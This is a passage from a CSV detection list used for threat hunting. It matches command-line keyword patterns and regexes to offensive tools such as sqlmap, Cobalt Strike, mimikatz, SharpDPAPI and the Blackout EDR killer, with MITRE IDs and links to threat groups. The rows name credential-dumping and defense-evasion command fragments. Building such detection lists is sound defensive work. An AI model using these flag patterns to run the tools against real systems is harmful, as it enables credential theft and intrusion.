?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --batch --dbs*",".{0,1000}\s\-\-batch\s\-\-dbs.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --batch --password*",".{0,1000}\s\-\-batch\s\-\-password.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* beacon.dll*",".{0,1000}\sbeacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "* beacon_win_default*",".{0,1000}\sbeacon_win_default.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* --beacon=*",".{0,1000}\s\-\-beacon\=.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* beacon64.bin *",".{0,1000}\sbeacon64\.bin\s.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "* Benjamin DELPY *",".{0,1000}\sBenjamin\sDELPY\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "* beRoot.exe*",".{0,1000}\sbeRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "* beRoot.py*",".{0,1000}\sbeRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "* bettercap*",".{0,1000}\sbettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "* --bf-hashes-file *",".{0,1000}\s\-\-bf\-hashes\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --bf-passwords-file *",".{0,1000}\s\-\-bf\-passwords\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --bhdump *",".{0,1000}\s\-\-bhdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* bhqc.py -*",".{0,1000}\sbhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "* bin2mac.py*",".{0,1000}\sbin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "* -bindPipe * -destHost * -destPort *",".{0,1000}\s\-bindPipe\s.{0,1000}\s\-destHost\s.{0,1000}\s\-destPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "* bitcoin-getaddr.nse*",".{0,1000}\sbitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bitcoin-info.nse*",".{0,1000}\sbitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bitcoinrpc-info.nse*",".{0,1000}\sbitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bittorrent-discovery.nse*",".{0,1000}\sbittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bjnp-discover.nse*",".{0,1000}\sbjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Blackout.cpp*",".{0,1000}\sBlackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sln*",".{0,1000}\sBlackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sys*",".{0,1000}\sBlackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* bleeding-jumbo john*",".{0,1000}\sbleeding\-jumbo\sjohn.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* blindeventlog.exe*",".{0,1000}\sblindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "* blob /target:*.bin* /pvk:*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* blob /target:*.bin* /unprotect*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* block_dll_policy.exe*",".{0,1000}\sblock_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --blockDLLs --ruy-lopez*",".{0,1000}\s\-\-blockDLLs\s\-\-ruy\-lopez.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" "* --bloodhound --ns ip --collection All*",".{0,1000}\s\-\-bloodhound\s\-\-ns\sip\s\-\-collection\sAll.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* bof_allocator *",".{0,1000}\sbof_allocator\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* bof_reg_collect_parser.py*",".{0,1000}\sbof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* bof_reuse_memory *",".{0,1000}\sbof_reuse_memory\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* -BOFBytes *",".{0,1000}\s\-BOFBytes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "* BOFNET *",".{0,1000}\sBOFNET\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "* BofRunner(*",".{0,1000}\sBofRunner\(.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "* -bootkey *",".{0,1000}\s\-bootkey\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Brc4LdapSentinelParser*",".{0,1000}\sBrc4LdapSentinelParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "* broadcast-ataoe-discover.nse*",".{0,1000}\sbroadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-avahi-dos.nse*",".{0,1000}\sbroadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-bjnp-discover.nse*",".{0,1000}\sbroadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-db2-discover.nse*",".{0,1000}\sbroadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dhcp6-discover.nse*",".{0,1000}\sbroadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dhcp-discover.nse*",".{0,1000}\sbroadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dns-service-discovery.nse*",".{0,1000}\sbroadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dropbox-listener.nse*",".{0,1000}\sbroadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* 